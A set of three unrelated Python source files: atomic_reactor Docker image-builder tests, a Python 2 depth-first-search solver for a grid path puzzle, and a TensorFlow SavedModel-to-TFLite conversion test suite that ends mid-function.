    assert built_inspect["Id"] is not None
@requires_internet
@with_all_sources
@pytest.mark.parametrize('parents_pulled', [True, False])
@pytest.mark.parametrize('insecure', [True, False])
@pytest.mark.parametrize('base_exist', [True, False])
def test_base_image_inspect(tmpdir, source_params, parents_pulled, insecure, base_exist):
    """base_image_inspect: {} for FROM scratch, inspect data for an
    existing base, and the right exception when the base is missing."""
    if MOCK:
        mock_docker()

    source_params.update({'tmpdir': str(tmpdir)})
    s = get_source_instance_for(source_params)
    b = InsideBuilder(s, '')
    b.tasker.build_method = default_build_method
    b.parents_pulled = parents_pulled

    # FROM scratch has no base image, so "missing base" cannot apply.
    if b.dockerfile_images.base_from_scratch:
        base_exist = True

    registry_name = "registry.example.com"
    # Rewrite every non-scratch parent to point at the test registry.
    original_parents = b.dockerfile_images.original_parents
    new_parents = []
    for parent in original_parents:
        if parent == 'scratch':
            new_parents.append(parent)
        else:
            mod_parent = ImageName.parse(parent)
            mod_parent.registry = registry_name
            new_parents.append(mod_parent.to_str())
    b.dockerfile_images = DockerfileImages(new_parents)
    b.pull_registries = {registry_name: {'insecure': insecure, 'dockercfg_path': str(tmpdir)}}

    if base_exist:
        if b.dockerfile_images.base_from_scratch:
            built_inspect = b.base_image_inspect
            assert built_inspect == {}
        else:
            # Un-pulled parents are inspected through the registry helper.
            if not parents_pulled:
                (flexmock(atomic_reactor.util)
                 .should_receive('get_inspect_for_image')
                 .with_args(b.dockerfile_images.base_image, b.dockerfile_images.base_image.registry,
                            insecure, str(tmpdir))
                 .and_return({'Id': 123}))

            built_inspect = b.base_image_inspect
            assert built_inspect is not None
            assert built_inspect["Id"] is not None
    else:
        if parents_pulled or b.dockerfile_images.custom_base_image:
            # Local daemon lookup: docker's NotFound surfaces as KeyError.
            response = flexmock(content="not found", status_code=404)
            (flexmock(docker.APIClient)
             .should_receive('inspect_image')
             .and_raise(docker.errors.NotFound, "xyz", response))
            with pytest.raises(KeyError):
                b.base_image_inspect  # pylint: disable=pointless-statement; is a property
        else:
            # Registry lookup: the helper's error propagates unchanged.
            (flexmock(atomic_reactor.util)
             .should_receive('get_inspect_for_image')
             .and_raise(NotImplementedError))
            with pytest.raises(NotImplementedError):
                b.base_image_inspect  # pylint: disable=pointless-statement; is a property
@requires_internet
@with_all_sources
@pytest.mark.parametrize(('image', 'will_raise'), [
    (
        "buildroot-fedora:latest",
        False,
    ),
    (
        "non-existing",
        True,
    ),
])
def test_get_base_image_info(tmpdir, source_params, image, will_raise):
    """get_base_image_info() returns inspect data for an existing base,
    None for FROM scratch, and raises for a missing image."""
    # Custom-base Dockerfiles are out of scope for this test.
    if DOCKERFILE_MULTISTAGE_CUSTOM_PATH in source_params['uri']:
        return
    if MOCK:
        mock_docker(provided_image_repotags=image)

    source_params.update({'tmpdir': str(tmpdir)})
    s = get_source_instance_for(source_params)
    b = InsideBuilder(s, image)
    b.tasker.build_method = default_build_method

    # A scratch base is never looked up, so it cannot raise.
    if b.dockerfile_images.base_from_scratch:
        will_raise = False

    if will_raise:
        with pytest.raises(Exception):
            b.get_base_image_info()
    else:
        built_inspect = b.get_base_image_info()
        if b.dockerfile_images.base_from_scratch:
            assert built_inspect is None
        else:
            assert built_inspect is not None
            assert built_inspect["Id"] is not None
            assert built_inspect["RepoTags"] is not None
def test_no_base_image(tmpdir):
    """set_df_path() must raise when the Dockerfile has no FROM line."""
    if MOCK:
        mock_docker()

    source = {'provider': 'path', 'uri': 'file://' + DOCKERFILE_OK_PATH, 'tmpdir': str(tmpdir)}
    b = InsideBuilder(get_source_instance_for(source), 'built-img')
    # Overwrite the Dockerfile with content lacking a FROM instruction.
    dfp = df_parser(str(tmpdir))
    dfp.content = "# no FROM\nADD spam /eggs"
    with pytest.raises(RuntimeError) as exc:
        b.set_df_path(str(tmpdir))
    assert "no base image specified" in str(exc.value)
def test_copy_from_is_blocked(tmpdir):
    """test when user has specified COPY --from=image (instead of builder)"""
    dfp = df_parser(str(tmpdir))
    if MOCK:
        mock_docker()
    source = {'provider': 'path', 'uri': 'file://' + str(tmpdir), 'tmpdir': str(tmpdir)}

    # Valid references: a named stage and a stage index that exist.
    dfp.content = dedent("""\
FROM monty AS vikings
FROM python
COPY --from=vikings /spam/eggs /bin/eggs
COPY --from=0 /spam/eggs /bin/eggs
COPY src dest
""")
    # init calls set_df_path, which should not raise an error:
    InsideBuilder(get_source_instance_for(source), 'built-img')

    dfp.content = dedent("""\
FROM monty as vikings
FROM python
# using a stage name we haven't seen should break:
COPY --from=notvikings /spam/eggs /bin/eggs
""")
    with pytest.raises(RuntimeError) as exc_info:
        InsideBuilder(get_source_instance_for(source), 'built-img')  # calls set_df_path at init
    assert "FROM notvikings AS source" in str(exc_info.value)

    dfp.content = dedent("""\
FROM monty as vikings
# using an index we haven't seen should break:
COPY --from=5 /spam/eggs /bin/eggs
""")
    with pytest.raises(RuntimeError) as exc_info:
        InsideBuilder(get_source_instance_for(source), 'built-img')  # calls set_df_path at init
    assert "COPY --from=5" in str(exc_info.value)
@requires_internet
@with_all_sources
@pytest.mark.parametrize('is_built', [
    True,
    False,
])
def test_ensure_built(tmpdir, source_params, is_built):
    """ensure_is_built()/ensure_not_built() must agree with the is_built
    flag: the matching one passes, the opposite one raises."""
    if MOCK:
        mock_docker()

    source_params.update({'tmpdir': str(tmpdir)})
    s = get_source_instance_for(source_params)
    b = InsideBuilder(s, '')
    b.is_built = is_built

    if is_built:
        assert b.ensure_is_built() is None
        with pytest.raises(Exception):
            b.ensure_not_built()
    else:
        assert b.ensure_not_built() is None
        with pytest.raises(Exception):
            b.ensure_is_built()
@requires_internet
@with_all_sources
@pytest.mark.parametrize(('image', 'will_raise'), [
    (
        "buildroot-fedora:latest",
        False,
    ),
    (
        "non-existing",
        True,
    ),
])
def test_get_image_built_info(tmpdir, source_params, image, will_raise):
    """get_built_image_info() succeeds for a known image and raises for an
    unknown one."""
    if MOCK:
        mock_docker(provided_image_repotags=image)

    source_params.update({'tmpdir': str(tmpdir)})
    s = get_source_instance_for(source_params)
    b = InsideBuilder(s, image)
    b.tasker.build_method = default_build_method

    if will_raise:
        with pytest.raises(Exception):
            b.get_built_image_info()
    else:
        b.get_built_image_info()
def test_build_result():
    """BuildResult invariants: fail_reason, image_id and oci_image_path are
    mutually exclusive, and accessors/predicates reflect the constructor."""
    # Invalid combinations must be rejected at construction time.
    with pytest.raises(AssertionError):
        BuildResult(fail_reason='it happens', image_id='spam')

    with pytest.raises(AssertionError):
        BuildResult(fail_reason='', image_id='spam')

    with pytest.raises(AssertionError):
        BuildResult(fail_reason='it happens', oci_image_path='/somewhere')

    with pytest.raises(AssertionError):
        BuildResult(image_id='spam', oci_image_path='/somewhere')

    with pytest.raises(AssertionError):
        BuildResult(image_id='spam', fail_reason='it happens', oci_image_path='/somewhere')

    # Valid single-source constructions and their accessors.
    assert BuildResult(fail_reason='it happens').is_failed()
    assert not BuildResult(image_id='spam').is_failed()

    assert BuildResult(image_id='spam', logs=list('logs')).logs == list('logs')
    assert BuildResult(fail_reason='it happens').fail_reason == 'it happens'
    assert BuildResult(image_id='spam').image_id == 'spam'

    assert BuildResult(image_id='spam', annotations={'ham': 'mah'}).annotations == {'ham': 'mah'}

    assert BuildResult(image_id='spam', labels={'ham': 'mah'}).labels == {'ham': 'mah'}

    assert BuildResult(image_id='spam').is_image_available()
    assert not BuildResult(fail_reason='it happens').is_image_available()
    # Remote results carry no local image and are not failures.
    assert not BuildResult.make_remote_image_result().is_image_available()

    assert not BuildResult.make_remote_image_result().is_failed()
def test_parent_images_to_str(tmpdir, caplog):
    """parent_images_to_str() maps resolved parents and logs a warning for
    parents that were never resolved."""
    if MOCK:
        mock_docker()

    source = {'provider': 'path', 'uri': 'file://' + DOCKERFILE_OK_PATH, 'tmpdir': str(tmpdir)}
    b = InsideBuilder(get_source_instance_for(source), 'built-img')
    b.dockerfile_images = DockerfileImages(['fedora:latest', 'bacon'])
    # Only 'fedora:latest' gets a resolved local image; 'bacon' stays
    # unresolved and should be reported in the log instead.
    b.dockerfile_images['fedora:latest'] = "spam"
    expected_results = {
        "fedora:latest": "spam:latest"
    }
    assert b.parent_images_to_str() == expected_results
    assert "None in: base bacon:latest has parent None" in caplog.text
| |
#!/usr/bin/env python
# -*- utf-8 -*-
import re
import copy
import time
# Constant move tables: direction letters (up, right, down, left) and the
# matching row/column deltas; direct[i] corresponds to direct_vector[i]
# ('x' is the row index, 'y' the column index — see parse_map).
direct = ['u', 'r', 'd', 'l']
direct_vector = [{'x' : -1, 'y' : 0},
                 {'x' : 0, 'y' : 1},
                 {'x' : 1, 'y' : 0},
                 {'x' : 0, 'y' : -1}]
def calculateNum(i, f, y):
    """Flatten 2-D coordinates (row i, column f) into a row-major index
    for a board of width y."""
    return f + y * i
def is_empty_not_change(map_data, i, f):
    """Bounds-checked read of cell (i, f); returns the stored cell value,
    or False when the coordinates fall outside the board."""
    inside = (0 <= i < map_data['x']) and (0 <= f < map_data['y'])
    return map_data['map'][i][f] if inside else False
def is_empty(map_data, i, f):
    """Return True iff (i, f) is an in-bounds open cell, and mark that
    cell visited (False) as a side effect."""
    if not (0 <= i < map_data['x'] and 0 <= f < map_data['y']):
        return False
    if not map_data['map'][i][f]:
        return False
    # Consume the cell so repeated probes see it as occupied.
    map_data['map'][i][f] = False
    return True
def parse_map(raw_str):
    """Parse a raw level string of the form '...x=H&...y=W&...<H*W chars>'
    into {'x': height, 'y': width, 'map': grid}, where grid cells are
    True for walkable ('0') and False for blocked ('1')."""
    map_data = {}
    print 'start parse map info\n'
    print 'here is map info ' + raw_str
    # x is height , y is width
    x = int(re.search('x=[0-9]+&', raw_str).group()[2:-1])
    y = int(re.search('y=[0-9]+&', raw_str).group()[2:-1])
    # The cell characters are assumed to be the last x*y characters of
    # raw_str.
    str_map = raw_str[-x*y : ]
    map_data['x'] = x;
    map_data['y'] = y;
    map_data['map'] = []
    for i in range(x):
        this_row = []
        for f in range(y):
            # '1' marks a wall; anything else is an open cell.
            if '1' == str_map[calculateNum(i, f, y)]:
                this_row.append(False)
            else:
                this_row.append(True)
        map_data['map'].append(copy.deepcopy(this_row))
    # Disabled debug dump of the parsed board.
    '''
    for i in range(x):
        for f in range(y):
            if not map_data['map'][i][f]:
                print '#',
            else:
                print '*',
        print ''
    print 'this level x =', x, 'y =', y
    '''
    return map_data
def count_du_1(map_data):
    """Collect [row, col] coordinates of every open cell that has exactly
    one open neighbour (degree 1); such cells must be path endpoints."""
    endpoints = []
    for row in range(map_data['x']):
        for col in range(map_data['y']):
            if not map_data['map'][row][col]:
                continue
            degree = sum(
                1 for d in range(4)
                if is_empty_not_change(map_data,
                                       row + direct_vector[d]['x'],
                                       col + direct_vector[d]['y']))
            if degree == 1:
                endpoints.append([row, col])
    return endpoints
def get_must_info(map_data, x, y):  # need update
    """Pruning heuristic for the solver: from current position (x, y),
    return (fill, feasible) where `fill` is the number of still-open
    cells and `feasible` is False when the board provably cannot be
    completed (disconnected open region, or the degree parity of the
    contracted region graph rules out an Eulerian-style traversal).

    NOTE(review): mutates map_data['map'] in place, replacing low-degree
    open cells with integer region ids — callers pass a deep copy.
    """
    fill = 0
    flag_id = 0
    map_data_another = copy.deepcopy(map_data)

    def div_dfs(x, y):
        # Flood-fill on the untouched copy; returns the component size.
        count = 0
        map_data_another['map'][x][y] = False
        for i in range(4):
            new_x = x + direct_vector[i]['x']
            new_y = y + direct_vector[i]['y']
            if is_empty(map_data_another, new_x ,new_y):
                count += div_dfs(new_x, new_y)
        return count + 1

    def dfs(x, y, flag):
        # Paint a connected group of still-boolean open cells with `flag`.
        map_data['map'][x][y] = flag
        for i in range(4):
            new_x = x + direct_vector[i]['x']
            new_y = y + direct_vector[i]['y']
            if judge_empty(new_x, new_y):
                if isinstance(map_data['map'][new_x][new_y], bool):
                    dfs(new_x, new_y, flag)

    def judge_empty(x, y):
        # Open test that treats already-flagged (int) cells as open.
        if x < 0 or x >= map_data['x']:
            return False
        if y < 0 or y >= map_data['y']:
            return False
        if isinstance(map_data['map'][x][y], bool):
            return map_data['map'][x][y]
        return True

    # Count open cells; give every open cell of degree < 3 its own id.
    for i in range(map_data['x']):
        for f in range(map_data['y']):
            if map_data['map'][i][f]:
                fill += 1
                du = 0
                first_x, first_y = i, f
                for dir_enum in range(4):
                    new_x = i + direct_vector[dir_enum]['x']
                    new_y = f + direct_vector[dir_enum]['y']
                    if True == judge_empty(new_x, new_y):
                        du += 1
                if du < 3:
                    map_data['map'][i][f] = flag_id
                    flag_id += 1
    if 0 == fill:
        return 0, True
    # All open cells must form a single connected component.
    if div_dfs(first_x, first_y) != fill:
        return fill, False
    # Group the remaining boolean open cells into regions.
    for i in range(map_data['x']):
        for f in range(map_data['y']):
            if (True == judge_empty(i, f)) and isinstance(map_data['map'][i][f], bool):
                dfs(i, f, flag_id)
                flag_id += 1
    # Tally region-graph degrees: scan up/left neighbours only so each
    # adjacent pair is counted once.
    edge_table = []
    for i in range(flag_id):
        edge_table.append([])
    du_count = [0] * flag_id
    for i in range(map_data['x']):
        for f in range(map_data['y']):
            if not isinstance(map_data['map'][i][f], bool):
                for dir_enum in [0, 3]:
                    new_x = i + direct_vector[dir_enum]['x']
                    new_y = f + direct_vector[dir_enum]['y']
                    if judge_empty(new_x, new_y):
                        point_foo = map_data['map'][i][f]
                        point_bar = map_data['map'][new_x][new_y]
                        if point_foo != point_bar:
                            du_count[point_foo] += 1
                            du_count[point_bar] += 1
                            edge_table[point_foo].append(point_bar)
                            edge_table[point_bar].append(point_foo)
    du_odd_count = 0
    du_zero_exist = False
    for point_enum in range(flag_id):
        if 0 == du_count[point_enum]:
            du_zero_exist = True
        if 1 == (du_count[point_enum] % 2):
            du_odd_count += 1
    # A zero-degree region alongside others means disconnection.
    if len(du_count) > 1 and du_zero_exist:
        return fill ,False
    # All regions of even degree: traversal possible from anywhere.
    if 0 == du_odd_count:
        return fill, True
    # More than two odd-degree regions: no Eulerian-style traversal.
    if 2 != du_odd_count:
        return fill, False
    # Exactly two odd regions: the traversal must start next to one of
    # them (or a direct neighbour of that region).
    for dir_enum in range(4):
        new_x = x + direct_vector[dir_enum]['x']
        new_y = y + direct_vector[dir_enum]['y']
        if judge_empty(new_x, new_y):
            start_id = map_data['map'][new_x][new_y]
            if 1 == (du_count[start_id] % 2):
                return fill, True
            for another_point in edge_table[start_id]:
                if 1 == (du_count[another_point] % 2):
                    return fill, True
    return fill, False
# just fit small 100 hash
def hash_function(map_data, x, y):
    """Encode the whole board bitmap plus the (x, y) position into a
    single integer, for memoizing visited search states.

    Coordinates are folded in base 100, so the scheme only stays
    collision-free while x and y are below 100. Returning the raw
    integer (instead of hash()) avoids hash collisions.
    """
    code = 0
    for row_idx in range(map_data['x']):
        for col_idx in range(map_data['y']):
            code *= 2
            if map_data['map'][row_idx][col_idx]:
                code += 1
    return (code * 100 + x) * 100 + y
def solve(map_data):
    """Search for a swipe path that fills every open cell of map_data.

    Returns ({'x', 'y', 'path'}, node_count) on success or
    ('no solution', node_count) on failure. Tries the forced start
    points (degree-1 cells) first, then every open cell.
    """
    hash_table = {}
    # Single-element list so the nested dfs can mutate the node counter.
    node = [0]

    def dfs(x, y, last_dir, path):
        node[0] += 1
        # Feasibility pruning on a copy (get_must_info mutates its input).
        fill, is_continue = get_must_info(copy.deepcopy(map_use_dfs), x, y)
        if 0 == fill:
            return path
        if not is_continue:
            return 'no solution'
        # Memoize visited (board, position) states.
        hash_code = hash_function(map_use_dfs, x, y)
        if hash_code in hash_table:
            return 'no solution'
        hash_table[hash_code] = True
        # A swipe always turns 90 degrees; only the first move is free.
        if -1 == last_dir:
            dir_step = [0, 1, 2, 3]
        else:
            dir_step = [(last_dir + 5) % 4, (last_dir + 3) % 4]
        for dir_enum in dir_step:
            new_x, new_y = x + direct_vector[dir_enum]['x'], y + direct_vector[dir_enum]['y']
            step_forward = 0
            # Slide until blocked, consuming cells along the way.
            while is_empty(map_use_dfs, new_x, new_y):
                step_forward += 1
                new_x += direct_vector[dir_enum]['x']
                new_y += direct_vector[dir_enum]['y']
            # Step back to the last open cell reached.
            new_x -= direct_vector[dir_enum]['x']
            new_y -= direct_vector[dir_enum]['y']
            # This direction made progress; recurse, then restore the
            # consumed cells on backtrack.
            if step_forward >= 1:
                solution = dfs(new_x, new_y, dir_enum, path + direct[dir_enum])
                if 'no solution' != solution:
                    return solution
                step_x, step_y = x, y
                for step_enum in range(step_forward):
                    step_x += direct_vector[dir_enum]['x']
                    step_y += direct_vector[dir_enum]['y']
                    map_use_dfs['map'][step_x][step_y] = True
        return 'no solution'

    response = {}
    # handle the du = 1
    du_1_vector = count_du_1(map_data)
    for du_1_enum in du_1_vector:
        x, y = du_1_enum[0], du_1_enum[1]
        print 'first from point', x, y, 'start dfs'
        map_use_dfs = copy.deepcopy(map_data)
        map_use_dfs['map'][x][y] = False
        solution = dfs(x, y, last_dir = -1, path = '')
        if 'no solution' != solution:
            response['x'] = x
            response['y'] = y
            response['path'] = solution
            print 'this level run', node[0], 'node'
            return response, node[0]
    # dfs from everygrid
    for i in range(map_data['x']):
        for f in range(map_data['y']):
            map_use_dfs = copy.deepcopy(map_data)
            if not is_empty(map_use_dfs, i, f):
                continue
            solution = dfs(x = i, y = f, last_dir = -1, path = '')
            if 'no solution' != solution:
                response['x'] = i
                response['y'] = f
                response['path'] = solution
                print 'this level run', node[0], 'node'
                return response, node[0]
    print 'this level run', node[0], 'node'
    return 'no solution', node[0]
# get map data from stdin
def main(map_info):
    # Solve one level: parse the map, run the solver, report timing, and
    # persist the answer as URL-encoded form data in a file named 'answer'.
    # NOTE(review): this module uses Python 2 print statements and will not
    # run under Python 3 as-is.
    map_data = parse_map(map_info)
    start_time = time.time()
    answer, node_num= solve(map_data)
    print answer
    print 'finish this level, cost', (time.time() - start_time), 's'
    print 'per second calculate', node_num / (time.time() - start_time), 'node'
    # NOTE(review): assumes a solution was found; solve can also return the
    # string 'no solution', in which case answer['x'] below would fail --
    # confirm callers only reach here on success.
    fd = open('answer', 'w')
    fd.write('x=' + str(answer['x']) + '&y=' + str(answer['y']) + '&path=' + str(answer['path']))
    fd.close()
    return answer
| |
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Test conversion from TensorFlow SavedModel to TFLite model."""
import collections
import tempfile
import typing
from absl.testing import absltest
from learner import test_data
from learner.brains import networks
from learner.brains import saved_model_to_tflite_model
from learner.brains import tfa_specs
import tensorflow as tf
from tf_agents.agents.behavioral_cloning import behavioral_cloning_agent
from tf_agents.policies import policy_saver
from tf_agents.trajectories import time_step as ts
# pylint: disable=g-bad-import-order
import common.generate_flatbuffers # pylint: disable=unused-import
from tflite import Model
from tflite import Tensor
from tflite import TensorType
class MockTensor(tf.Tensor):
  """Minimal tf.Tensor stand-in that only reports a fixed name."""

  def __init__(self, name):
    # Deliberately skip tf.Tensor's initializer: tests only read `.name`.
    self._mock_name = name

  @property
  def name(self):
    """Name this mock tensor reports."""
    return self._mock_name
# Lightweight records used by the name-mapping tests below in place of real
# tensor specs and concrete functions.
MockTensorSpec = collections.namedtuple('MockTensorSpec', ['name'])
MockFunction = collections.namedtuple(
    'MockFunction',
    ['inputs', 'structured_input_signature', 'outputs', 'structured_outputs'])
class SavedModelToTFLiteModelTest(absltest.TestCase):
  """Test saved_model_to_tflite_model."""
  def save_model(self) -> str:
    """Create and save a model.
    Returns:
      Path to the directory containing the saved model.
    """
    # NOTE(review): only .name is kept, so the TemporaryDirectory object is
    # unreferenced and its directory may be removed on garbage collection --
    # confirm the path is consumed before that can happen.
    saved_model_path = tempfile.TemporaryDirectory().name
    brain_spec = tfa_specs.BrainSpec(test_data.brain_spec())
    # The agent is never trained here, so optimizer and loss are placeholders.
    agent = behavioral_cloning_agent.BehavioralCloningAgent(
        ts.time_step_spec(brain_spec.observation_spec.tfa_spec),
        brain_spec.action_spec.tfa_spec,
        cloning_network=networks.FalkenNetwork(
            brain_spec, {
                'dropout': None,
                'fc_layers': [32],
                'feelers_version': 'v1'
            }),
        optimizer=None,
        loss_fn=lambda *unused_args: None)
    agent.initialize()
    # Touch the policy variables to force their creation before saving.
    _ = agent.policy.variables()
    policy_saver.PolicySaver(agent.policy, batch_size=1).save(saved_model_path)
    return saved_model_path
  def test_rename_tflite_tensors(self):
    """Test patching TF Lite FlatBuffer Tensors with a new names."""
    tensor0 = Tensor.TensorT()
    tensor0.name = 'foo_bar_0'.encode(
        saved_model_to_tflite_model._FLATBUFFERS_TEXT_ENCODING)
    tensor1 = Tensor.TensorT()
    tensor1.name = 'bar_0_baz'.encode(
        saved_model_to_tflite_model._FLATBUFFERS_TEXT_ENCODING)
    tensor2 = Tensor.TensorT()
    tensor2.name = 'bar_1_baz'.encode(
        saved_model_to_tflite_model._FLATBUFFERS_TEXT_ENCODING)
    # Only tensors at indices 0 and 2 are eligible for renaming; tensor1 must
    # keep its original name.
    saved_model_to_tflite_model._rename_tflite_tensors(
        [tensor0, tensor1, tensor2], [0, 2],
        {'foo_bar_0': '0/foo/bar/0',
         'bar_1_baz': '0/bar/1/baz'})
    self.assertEqual(tensor0.name.decode(
        saved_model_to_tflite_model._FLATBUFFERS_TEXT_ENCODING), '0/foo/bar/0')
    self.assertEqual(tensor1.name.decode(
        saved_model_to_tflite_model._FLATBUFFERS_TEXT_ENCODING), 'bar_0_baz')
    self.assertEqual(tensor2.name.decode(
        saved_model_to_tflite_model._FLATBUFFERS_TEXT_ENCODING), '0/bar/1/baz')
  def test_tf_tensor_name_to_tflite_name(self):
    """Test converting TF tensor names to TF lite tensor names."""
    # The ":<output_index>" suffix is stripped; names without one pass through.
    self.assertEqual(
        saved_model_to_tflite_model._tf_tensor_name_to_tflite_name('foo_bar:0'),
        'foo_bar')
    self.assertEqual(
        saved_model_to_tflite_model._tf_tensor_name_to_tflite_name('bar_baz:1'),
        'bar_baz')
    self.assertEqual(
        saved_model_to_tflite_model._tf_tensor_name_to_tflite_name('a_tensor'),
        'a_tensor')
  def test_tf_tensor_spec_name_to_tensor_name(self):
    """Test converting TF tensor spec names to tensor argument names."""
    # Per these examples: any leading index is dropped, slashes become
    # underscores, and the result is lowercased.
    self.assertEqual(
        saved_model_to_tflite_model._tf_tensor_spec_name_to_tensor_name(
            '0/foo/Bar/1/bazNumber'), 'foo_bar_1_baznumber')
    self.assertEqual(
        saved_model_to_tflite_model._tf_tensor_spec_name_to_tensor_name(
            'magic/Stuff'), 'magic_stuff')
  def test_create_tflite_to_tf_tensor_name_map(self):
    """Test creating a map of TF Lite to TF tensor spec name."""
    input_map, output_map = (
        saved_model_to_tflite_model._create_tflite_to_tf_tensor_name_map(
            MockFunction(
                inputs=[MockTensor('foo_0_bar:0'),
                        MockTensor('bish_0_bosh:0')],
                structured_input_signature=(
                    [MockTensorSpec('0/foo/0/bar')],
                    {'0/bish/0/bosh': MockTensorSpec('0/bish/0/bosh')}
                ),
                outputs=[MockTensor('identity_0:0'),
                         MockTensor('random_1:0')],
                structured_outputs={
                    'action': {'turn_key': MockTensor('action/turn_key'),
                               'open_door': MockTensor('action/open_door')}})))
    self.assertEqual(input_map, {'foo_0_bar': '0/foo/0/bar',
                                 'bish_0_bosh': '0/bish/0/bosh'})
    # Per this expectation, outputs pair with the structured output names in
    # sorted order ('open_door' before 'turn_key').
    self.assertEqual(output_map, {'identity_0': 'action/open_door',
                                  'random_1': 'action/turn_key'})
  def test_create_tflite_to_tf_tensor_name_map_broken_function(self):
    """Fail with mismatched tensor spec to tensor name."""
    with self.assertRaises(AssertionError):
      saved_model_to_tflite_model._create_tflite_to_tf_tensor_name_map(
          MockFunction(
              inputs=[MockTensor('foo_0_bar'),
                      MockTensor('bish_0_bosh:0')],
              structured_input_signature=(
                  [MockTensorSpec('0/foo/0/bar')],
                  {'0/bish/0/bosh': MockTensorSpec('0/bish/0/bosh')}
              ),
              outputs=[], structured_outputs=[]))
  def test_convert_saved_model(self):
    """Convert a saved model to TF Lite model."""
    # Convert to a TFLite FlatBuffer.
    tflite_flatbuffer = saved_model_to_tflite_model.convert(
        self.save_model(), ['action'])
    model = Model.ModelT.InitFromObj(
        Model.Model.GetRootAsModel(tflite_flatbuffer, 0))
    self.assertLen(model.subgraphs, 1)
    subgraph = model.subgraphs[0]
    inputs_and_outputs = []
    # Collect (name, type, shape) for every subgraph input and output tensor,
    # falling back to `shape` when `shapeSignature` is absent.
    for i in list(subgraph.inputs) + list(subgraph.outputs):
      tensor = subgraph.tensors[i]
      shape = tensor.shapeSignature if tensor.shapeSignature else tensor.shape
      inputs_and_outputs.append((
          tensor.name.decode(
              saved_model_to_tflite_model._FLATBUFFERS_TEXT_ENCODING),
          tensor.type, repr([d for d in shape])))
    self.assertCountEqual(
        inputs_and_outputs,
        [('0/discount',
          TensorType.TensorType.FLOAT32, '[1]'),
         ('0/observation/global_entities/0/position',
          TensorType.TensorType.FLOAT32, '[1, 3]'),
         ('0/observation/global_entities/0/rotation',
          TensorType.TensorType.FLOAT32, '[1, 4]'),
         ('0/observation/global_entities/1/position',
          TensorType.TensorType.FLOAT32, '[1, 3]'),
         ('0/observation/global_entities/1/rotation',
          TensorType.TensorType.FLOAT32, '[1, 4]'),
         ('0/observation/global_entities/2/drink',
          TensorType.TensorType.INT32, '[1, 1]'),
         ('0/observation/global_entities/2/evilness',
          TensorType.TensorType.FLOAT32, '[1, 1]'),
         ('0/observation/global_entities/2/position',
          TensorType.TensorType.FLOAT32, '[1, 3]'),
         ('0/observation/global_entities/2/rotation',
          TensorType.TensorType.FLOAT32, '[1, 4]'),
         ('0/observation/player/health',
          TensorType.TensorType.FLOAT32, '[1, 1]'),
         ('0/observation/player/position',
          TensorType.TensorType.FLOAT32, '[1, 3]'),
         ('0/observation/player/rotation',
          TensorType.TensorType.FLOAT32, '[1, 4]'),
         ('0/observation/player/feeler',
          TensorType.TensorType.FLOAT32, '[1, 3, 2]'),
         ('0/observation/camera/position',
          TensorType.TensorType.FLOAT32, '[1, 3]'),
         ('0/observation/camera/rotation',
          TensorType.TensorType.FLOAT32, '[1, 4]'),
         ('0/reward',
          TensorType.TensorType.FLOAT32, '[1]'),
         ('0/step_type',
          TensorType.TensorType.INT32, '[1]'),
         ('action/switch_weapon',
          TensorType.TensorType.INT32, '[1, 1]'),
         ('action/throttle',
          TensorType.TensorType.FLOAT32, '[1, 1]'),
         ('action/joy_pitch_yaw',
          TensorType.TensorType.FLOAT32, '[1, 2]'),
         ('action/joy_xz',
          TensorType.TensorType.FLOAT32, '[1, 2]'),
         ('action/joy_xz_world',
          TensorType.TensorType.FLOAT32, '[1, 2]'),
        ])
  def test_verify_function_output_order(self):
    """Verify the outputs of a tf.function.ConcreteFunction are sorted."""
    # Outputs of tf_agents policies are dictionaries with each key indicating
    # the name of the output (action) spec for the agent.
    # http://cs/piper///depot/google3/third_party/py/tf_agents/policies/\
    # policy_saver.py;l=603;rcl=314434347
    # This dictionary (which is unsorted) is flattened and sorted when
    # serialized by tf.function.ConcreteFunction._build_call_outputs().
    # Expected input mapping from TFLite to TF inputs of the Lout module.
    expected_input_map = {'player_drink_booze': 'player/drink/booze',
                          'player_drink_bubbles': 'player/drink/bubbles',
                          'player_drink_water': 'player/drink/water'}
    # Test with all 2^N combinations of the following outputs.
    outputs = ['action/player/chestpuff', 'action/player/bowl',
               'action/player/stride', 'action/player/bluff',
               'action/player/swing']
    combinations = 2 ** len(outputs)
    for combination in range(1, combinations):
      # Decode the combination bitmask into the subset of selected outputs.
      selected = set()
      offset = 0
      bits = combination
      while bits:
        if bits & 1:
          selected.add(outputs[offset])
        offset += 1
        bits >>= 1
      class Lout(tf.Module):
        """Test module that provides a signature to serialize."""
        def __init__(self, output_names: typing.Iterable[str], **kwargs):
          """Initialize the module to generate the specified set of outputs.
          Args:
            output_names: Set of outputs to generate.
            **kwargs: Passed to tf.Module's initializer.
          """
          self._output_names = tf.constant(list(output_names))
          super(Lout, self).__init__(**kwargs)
        @tf.function(input_signature=[
            tf.TensorSpec((1,), dtype=tf.float32, name='player/drink/booze'),
            tf.TensorSpec((1,), dtype=tf.float32, name='player/drink/water'),
            tf.TensorSpec((1,), dtype=tf.int32, name='player/drink/bubbles'),
        ])
        def __call__(self, ethanol, h2o,
                     carbonation) -> typing.Iterable[tf.Tensor]:
          """Generate a set of outputs.
          The values of the outputs are _not_ used by the test case.
          Args:
            ethanol: Increases value of outputs.
            h2o: Dilutes value of outputs.
            carbonation: Modulates value of outputs.
          Returns:
            Dictionary of outputs whose names match _output_names.
          """
          output_tensors = {}
          for index, output in enumerate(self._output_names.numpy()):
            output_tensors[output.decode()] = tf.identity(
                (ethanol - h2o) * float(index % carbonation), name=output)
          return output_tensors
      # Call the function at least once to instance.
      lout = Lout(selected, name=f'Lout{combination}')
      _ = lout(tf.constant([0.2]), tf.constant([0.5]), tf.constant([5]))
      with tempfile.TemporaryDirectory() as temp_name:
        # Save and load the model to retrieve the graph signature.
        tf.saved_model.save(lout, temp_name)
        tf.keras.backend.clear_session()
        model = tf.saved_model.load(temp_name)
        graph = model.signatures['serving_default']
        input_map, output_map = (
            saved_model_to_tflite_model._create_tflite_to_tf_tensor_name_map(
                graph))
        # Output tensors should be sorted by tensor name.
        expected_output_map = {}
        for index, output in enumerate(sorted(selected)):
          expected_output_map[f'Identity_{index}'
                              if index > 0 else 'Identity'] = output
